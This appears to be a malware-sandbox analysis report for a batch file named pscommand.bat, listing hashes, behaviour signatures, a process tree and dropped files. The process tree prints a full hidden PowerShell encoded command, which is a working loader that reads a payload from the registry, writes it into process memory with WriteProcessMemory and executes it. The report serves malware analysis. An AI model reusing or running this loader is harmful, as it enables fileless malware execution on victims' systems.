bc1dc22094ff8b5bd16226aee5281fa8dd68b5b99055b8f4076f36a06a740ccd

General

Target

pscommand.bat
Size

8KB
MD5

04e2ac379f0fa10dedee9fd920936965
SHA1

cbebe36f59406ad99a0ec00063024d40d3025ee8
SHA256

bc1dc22094ff8b5bd16226aee5281fa8dd68b5b99055b8f4076f36a06a740ccd
SHA512

bd0700a8527c8f7d1931f0d7a9e87755dc888a747bff721cc89c134f6e8902e8e1343831cd87e7fe9f141a376b0201949a2ffcc543cdcf0da83ee83444776d7f
SSDEEP

192:oWzvAAErrCn+7FXZYPDhLhxP3YXCtyT80tBwiUBeNoRDXLoJbSLKMKISkxppzCXF:oWzvyrOnKFXZYPDhLhxVW80tjUBeNQzO

Score

1^/10

Malware Config

Signatures

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe
1636	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1636	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3444 wrote to memory of 1636	3444	cmd.exe	85
PID 3444 wrote to memory of 1636	3444	cmd.exe	85
PID 1636 wrote to memory of 4160	1636	powershell.exe	86
PID 1636 wrote to memory of 4160	1636	powershell.exe	86
PID 4160 wrote to memory of 1144	4160	csc.exe	87
PID 4160 wrote to memory of 1144	4160	csc.exe	87

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pscommand.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe -NonInteractive -WindowStyle Hidden -EncodedCommand JABWAGEAQwBzADMAZgBkAEUAbgAgAD0AIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFMAaABlAGwAbAAiADsAJABBADgAOQBRAGMAMgA3AHMATQAwACAAPQAgACIAewBDADkAQQAzADMARgA2AEIALQBBADgANgA0AC0ANQAzADQANQAtAEIAOQAwAEYARABBAEUAMwA4ADgANQAwAEQANwAxADEAfQAiADsAZgB1AG4AYwB0AGkAbwBuACAATABIADMAWQBOAGwAMQAyAG0AewBQAGEAcgBhAG0AKABbAE8AdQB0AHAAdQB0AFQAeQBwAGUAKABbAFQAeQBwAGUAXQApAF0AWwBQAGEAcgBhAG0AZQB0AGUAcgAoACAAUABvAHMAaQB0AGkAbwBuACAAPQAgADAAKQBdAFsAVAB5AHAAZQBbAF0AXQAkAG8AQwBVAGsAUgBoADEAdgA4ACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAeQBwAGUAWwBdACgAMAApACkALABbAFAAYQByAGEAbQBlAHQAZQByACgAIABQAG8AcwBpAHQAaQBvAG4AIAA9ACAAMQAgACkAXQBbAFQAeQBwAGUAXQAkAEQAcgBGAFcASQByAEEAeQBYACAAPQAgAFsAVgBvAGkAZABdACkAJABIAFoAcwBUAEgAQwAgAD0AIABbAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4AOwAkAFQAMQBvAHAAUwA5AEwAaQBzADcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACgAJwBSAGUAZgBsAGUAYwB0AGUAZABEAGUAbABlAGcAYQB0AGUAJwApADsAJAByAHkAUgA5AHQATwBsACAAPQAgACQASABaAHMAVABIAEMALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAEEAcwBzAGUAbQBiAGwAeQAoACQAVAAxAG8AcABTADkATABpAHMANwAsACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBFAG0AaQB0AC4AQQBzAHMAZQBtAGIAbAB5AEIAdQBpAGwAZABlAHIAQQBjAGMAZQBzAHMAXQA6ADoAUgB1AG4AKQA7ACQASgBBAFIATwBlAHQAcwByAEYAWgAgAD0AIAAkAHIAeQBSADkAdABPAGwALgBEAGUAZgBpAG4AZQBEAHkAbgBhAG0AaQBjAE0AbwBkAHUAbABlACgAJwBJAG4ATQBlAG0AbwByAHkATQBvAGQAdQBsAGUAJwAsACAAJABmAGEAbABzAGUAKQA7ACQAWgBOAFgATQBGAGUASQAgAD0AIAAkAEoAQQBSAE8AZQB0AHMAcgBGAFoALgBEAGUAZgBpAG4AZQBUAHkAcABlACgAJwBNAHkARABlAGwAZQBnAGEAdABlAFQAeQBwAGUAJwAsACAAJwBDAGwAYQBzAHMALAAgAFAAdQBiAGwAaQBjACwAIABTAGUAYQBsAGUAZAAsACAAQQBuAHMAaQBDAGwAYQBzAHMALAAgAEEAdQB0AG8AQwBsAGEAcwBzACcALAAgAFsAUwB5AHMAdABlAG0ALgBNAHUAbAB0AGkAYwBhAHMAdABEAGUAbABlAGcAYQB0AGUAXQApADsAJABEAGkAcwBoAHkAdgA2AHAAaABSACAAPQAgACQAWgBOAFgATQBGAGUASQAuAEQAZQBmAGkAbgBlAEMAbwBuAHMAdAByAHUAYwB0AG8AcgAoACcAUgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQwBhAGwAbABpAG4AZwBDAG8AbgB2AGUAbgB0AGkAbwBuAHMAXQA6ADoAUwB0AGEAbgBkAGEAcgBkACwAIAAkAG8AQwBVAGsAUgBoADEAdgA4ACkAOwAkAEQAaQBzAGgAeQB2ADYAcABoAFIALgBTAGUAdABJAG0AcABsAGUAbQBlAG4AdABhAHQAaQBvAG4ARgBsAGEAZwBzACgAJwBSAHUAbgB0AGkAbQBlACwAIABNAGEAbgBhAGcAZQBkACcAKQA7ACQAcwBWAFIAcABvAHkATAAgAD0AIAAkAFoATgBYAE0ARgBlAEkALgBEAGUAZgBpAG4AZQBNAGUAdABoAG8AZAAoACcASQBuAHYAbwBrAGUAJwAsACAAJwBQAHUAYgBsAGkAYwAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAE4AZQB3AFMAbABvAHQALAAgAFYAaQByAHQAdQBhAGwAJwAsACAAJABEAHIARgBXAEkAcgBBAHkAWAAsACAAJABvAEMAVQBrAFIAaAAxAHYAOAApADsAJABzAFYAUgBwAG8AeQBMAC4AUwBlAHQASQBtAHAAbABlAG0AZQBuAHQAYQB0AGkAbwBuAEYAbABhAGcAcwAoACcAUgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAAnACkAOwBXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACQAWgBOAFgATQBGAGUASQAuAEMAcgBlAGEAdABlAFQAeQBwAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABnADIAVwBsAEsAKAAkAEgAUwAxAFoATwAsACAAJAB0AGkAaQB1AGEAaQApACAAewAkAEkAYgBzAEYAUQA2ACAAIAA9ACAAJABIAFMAMQBaAE8AWwAkAHQAaQBpAHUAYQBpACsAMABdACAAKgAgADEANgA3ADcANwAyADEANgA7ACQASQBiAHMARgBRADYAIAArAD0AIAAkAEgAUwAxAFoATwBbACQAdABpAGkAdQBhAGkAKwAxAF0AIAAqACAANgA1ADUAMwA2ADsAJABJAGIAcwBGAFEANgAgACsAPQAgACQASABTADEAWgBPAFsAJAB0AGkAaQB1AGEAaQArADIAXQAgACoAIAAyADUANgA7ACQASQBiAHMARgBRADYAIAArAD0AIAAkAEgAUwAxAFoATwBbACQAdABpAGkAdQBhAGkAKwAzAF0AIAAqACAAMQA7AHIAZQB0AHUAcgBuACAAJABJAGIAcwBGAFEANgA7AH0AJABMAHIAVgA4AEQAdABWAHYAIAA9ACAAIgB7ADAAfQBJAG4AdABQAHQAcgAgAEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAOwB7ADAAfQBJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABhAGQAZAByACwAIAB1AGkAbgB0ACAAcwBpAHoAZQAsACAAdQBpAG4AdAAgAHQAeQBwAGUALAAgAHUAaQBuAHQAIABwAHIAbwB0ACkAOwB7ADAAfQBiAG8AbwBsACAAVwByAGkAdABlAFAAcgBvAGMAZQBzAHMATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHAAcgBvAGMALAAgAEkAbgB0AFAAdAByACAAYQBkAGQAcgAsACAAYgB5AHQAZQBbAF0AIABiAHUAZgAsACAAdQBpAG4AdAAgAHMAaQB6AGUALAAgAHUAaQBuAHQAIAB3AHIAaQB0AHQAZQBuACkAOwB7ADAAfQB1AGkAbgB0ACAAUwBlAHQARQByAHIAbwByAE0AbwBkAGUAKAB1AGkAbgB0ACAAbQBvAGQAZQApADsAIgAgAC0AZgAgACIAWwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbABgACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgACIAOwAkAHkAegA3AGIANwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEwAcgBWADgARAB0AFYAdgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBpAGYAIAAoACEAJAB5AHoANwBiADcAKQAgAHsAUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQAgACQAUABJAEQAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHoAdgBhAHcAbQBPADkANQAyACgAJABMAHIAVgA4AEQAdABWAHYALAAgACQATABFADkAUwBhAGEARgB1ADcAdQAsACAAJABMAEUAcwBnAEYAWQBZADEATQBkACkAIAB7ACQAQQBNADUARgB3ADAAZgBDAHUAUwAgAD0AIAAkAHkAegA3AGIANwA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQA7ACQATQBIAFUASABWACAAPQAgACQAeQB6ADcAYgA3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAkAEwAcgBWADgARAB0AFYAdgAuAEwAZQBuAGcAdABoACwAMAB4ADAAMAAwADAAMwAwADAAMAAsADAAeAA0ADAAKQA7ACQATwBNAGQAbABHAFIAIAA9ACAAJAB5AHoANwBiADcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQATABFAHMAZwBGAFkAWQAxAE0AZAAuAEwAZQBuAGcAdABoACwAMAB4ADAAMAAwADAAMwAwADAAMAAsADAAeAA0ADAAKQA7ACQAeQB6ADcAYgA3ADoAOgBXAHIAaQB0AGUAUAByAG8AYwBlAHMAcwBNAGUAbQBvAHIAeQAoACQAQQBNADUARgB3ADAAZgBDAHUAUwAsACAAJABNAEgAVQBIAFYALAAgACQATAByAFYAOABEAHQAVgB2ACwAIAAkAEwAcgBWADgARAB0AFYAdgAuAEwAZQBuAGcAdABoACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJAB5AHoANwBiADcAOgA6AFcAcgBpAHQAZQBQAHIAbwBjAGUAcwBzAE0AZQBtAG8AcgB5ACgAJABBAE0ANQBGAHcAMABmAEMAdQBTACwAIAAkAE8ATQBkAGwARwBSACwAIAAkAEwARQBzAGcARgBZAFkAMQBNAGQALAAgACQATABFAHMAZwBGAFkAWQAxAE0AZAAuAEwAZQBuAGcAdABoACwAIAAwACkAIAB8ACAATwB1AHQALQBOAHUAbABsADsAJAB3AGEARQBtAGsAWgBSAFcAbwBGACAAPQAgAFsASQBuAHQAUAB0AHIAXQAoACQATQBIAFUASABWAC4AVABvAEkAbgB0ADYANAAoACkAKwAkAEwARQA5AFMAYQBhAEYAdQA3AHUAKQA7ACQAQwBpAFQAZwB2AGUAIAA9ACAATABIADMAWQBOAGwAMQAyAG0AIABAACgAWwBJAG4AdABQAHQAcgBdACwAIABbAEkAbgB0AFAAdAByAF0AKQAgACgAWwBWAG8AaQBkAF0AKQA7ACQAcQB6AFkAUgBGACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEcAZQB0AEQAZQBsAGUAZwBhAHQAZQBGAG8AcgBGAHUAbgBjAHQAaQBvAG4AUABvAGkAbgB0AGUAcgAoACQAdwBhAEUAbQBrAFoAUgBXAG8ARgAsACAAJABDAGkAVABnAHYAZQApADsAJAB5AHoANwBiADcAOgA6AFMAZQB0AEUAcgByAG8AcgBNAG8AZABlACgAMAB4ADgAMAAwADYAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwAkAHEAegBZAFIARgAuAEkAbgB2AG8AawBlACgAJABPAE0AZABsAEcAUgAsACAAJABNAEgAVQBIAFYAKQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAVwAzAEYANgB1ACgAJABzAEcAawBoADAAWgBiADYAbgAsACAAJABQAGoARgBqAEUAUwBlAG8AKQAgAHsAJABVAFcAMgBVAGcAVgBYAEgAIAA9ACAAZwAyAFcAbABLACAAJABzAEcAawBoADAAWgBiADYAbgAgADEAOwAkAGIAbwBsAE8AbAAgAD0AIAA1ADsAdwBoAGkAbABlACAAKAAkAGIAbwBsAE8AbAArADgAIAAtAGwAdAAgACQAVQBXADIAVQBnAFYAWABIACkAIAB7ACQAcwBZAEcAMwBlAEUASQBZADUAUgAgAD0AIAAkAHMARwBrAGgAMABaAGIANgBuAFsAJABiAG8AbABPAGwAXQA7ACQAUQBIAEwARQBIAE8ARwAgAD0AIABnADIAVwBsAEsAIAAkAHMARwBrAGgAMABaAGIANgBuACAAKAAkAGIAbwBsAE8AbAArADEAKQA7ACQAeABCAHAAYgB5AHgAaABrADAAIAA9ACAAZwAyAFcAbABLACAAJABzAEcAawBoADAAWgBiADYAbgAgACgAJABiAG8AbABPAGwAKwA1ACkAOwAkAGIAbwBsAE8AbAAgACsAPQAgADkAOwBpAGYAIAAoACQAcwBZAEcAMwBlAEUASQBZADUAUgAgAC0AZQBxACAAJABQAGoARgBqAEUAUwBlAG8AKQAgAHsAegB2AGEAdwBtAE8AOQA1ADIAIAAkAHMARwBrAGgAMABaAGIANgBuAFsAJABiAG8AbABPAGwALgAuACgAJABiAG8AbABPAGwAKwAkAFEASABMAEUASABPAEcAKQBdACAAJAB4AEIAcABiAHkAeABoAGsAMAAgACQAcwBHAGsAaAAwAFoAYgA2AG4AOwBiAHIAZQBhAGsAOwB9ACAAZQBsAHMAZQAgAHsAJABiAG8AbABPAGwAIAArAD0AIAAkAFEASABMAEUASABPAEcAOwB9AH0AfQAkAE0ASQBKAEsAdwAyADYAZwAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAVgBhAEMAcwAzAGYAZABFAG4AIgAgAC0ATgBhAG0AZQAgACIAJABBADgAOQBRAGMAMgA3AHMATQAwACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuACQAQQA4ADkAUQBjADIANwBzAE0AMAA7AGkAZgAgACgAIQAkAE0ASQBKAEsAdwAyADYAZwApACAAewAkAE0ASQBKAEsAdwAyADYAZwAgAD0AIAAiACIAOwBmAG8AcgAgACgAJABiAG8AbABPAGwAPQAwADsAIAAkAFgARgA0AHYAbwBSAD0AKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgAkAFYAYQBDAHMAMwBmAGQARQBuACIAIAAtAE4AYQBtAGUAIAAiACQAQQA4ADkAUQBjADIANwBzAE0AMAAtACQAYgBvAGwATwBsACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQAuACIAJABBADgAOQBRAGMAMgA3AHMATQAwAC0AJABiAG8AbABPAGwAIgA7ACAAJABiAG8AbABPAGwAKwArACkAIAB7ACQATQBJAEoASwB3ADIANgBnACAAKwA9ACAAJABYAEYANAB2AG8AUgAuAFQAcgBpAG0AKAApADsAfQB9ACQAcwBHAGsAaAAwAFoAYgA2AG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATQBJAEoASwB3ADIANgBnACkAOwAkAHMARwBrAGgAMABaAGIANgBuAFsAMABdACAAPQAgADAAOwBpAGYAIAAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApACAAewBXADMARgA2AHUAIAAkAHMARwBrAGgAMABaAGIANgBuACAAMgA7AH0AIABlAGwAcwBlACAAewBXADMARgA2AHUAIAAkAHMARwBrAGgAMABaAGIANgBuACAAMQA7AH0AUwB0AG8AcAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAbwByAGMAZQAgACQAUABJAEQAOwA=
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4160
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES908D.tmp" "c:\Users\Admin\AppData\Local\Temp\iozfbg2b\CSC9C7E47D9992B4B64BFC5F81C24B08E4.TMP"
      4⤵
      PID:1144

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES908D.tmp

Filesize
1KB

MD5
9b1324cfc11b34b6627b2894c48613da

SHA1
988fc899c4308f3da8a415fd6a9180703da7a788

SHA256
283f32c855bd42706144fef5361750b6c6bf4a3d0084a3897e33274ac440d4b4

SHA512
c28e49f0a8afa0e7255e526123815bbd692c467c43585d872d188383491ca64eb6c92f6babb04937c2c4c99d3af23aded201a1cf8e0266f6a9677d19a8396cca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lrbertn2.ryf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.dll

Filesize
3KB

MD5
b15287cc232ad4cf2fc05cac348186ce

SHA1
6836b293ad4db006c8d8cf42d73413b013db324d

SHA256
f97325dd8518d0aec36fd56f8356fe09c2300fa6364a96d4a56e93ab308a279c

SHA512
5a85f3e5f10022350d806772a69277751466290355aec1247999163aaf4eb4fba9ec73e37bb8e0642637fda0611e50436127f821ff3edbd269f55f673a68b892

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iozfbg2b\CSC9C7E47D9992B4B64BFC5F81C24B08E4.TMP

Filesize
652B

MD5
73b0ddc5360129d94fbcaf0e23a711bf

SHA1
86ff28f6bed82ab16b3421c522ddb6169222fdcd

SHA256
a916bbb4371982521746fc97c50e41a3418acb266d81536c7053b792803e3a5b

SHA512
48a8165ab685fed8b070162a331e3ca6e1fce3fbba54688af57b502e5cc2bd6fd493276d6eacb20d1da26dc1cf49f5ea3b0159bac1839e26c82e16bcaee4b78d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.0.cs

Filesize
528B

MD5
294576045a17dc1cbd5d513d68ab3665

SHA1
74f3b68beb9eee42c5a644072a9fc7f13d7c63f0

SHA256
8e7baa4597002dbd6f160a291852e66d91fe6ce38bdffb8aa1473b57fb97f381

SHA512
6b48f1f23c11e42cabfb06e9ef913afa926344f4c08ede7bff50d33ace384b7999f9d7c772252937446c91aa2eac32923375dfe0161b55984538b58655893abe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\iozfbg2b\iozfbg2b.cmdline

Filesize
369B

MD5
68d3b329677ec32faa4cb8d78704c87e

SHA1
cd90ff3e3c76c92aaf0e2ef0a194186d6d8ec056

SHA256
ac3d971ed216cfd8c7f7404379972b2eed8be6d28490778a7fbc9fc36268787c

SHA512
3821181e38c606db7d1d32fd8ab63a60790b4e5ebdc8b3dc3fc81c258c16b98cc540e31fbabda6314b2a9af1f44002ca94c78a4a60eb60511e5c0e28cc143c82

Download Submit
memory/1636-142-0x0000029856720000-0x0000029856742000-memory.dmp

Filesize
136KB

Download
memory/1636-143-0x0000029854570000-0x0000029854580000-memory.dmp

Filesize
64KB

Download
memory/1636-144-0x0000029854570000-0x0000029854580000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads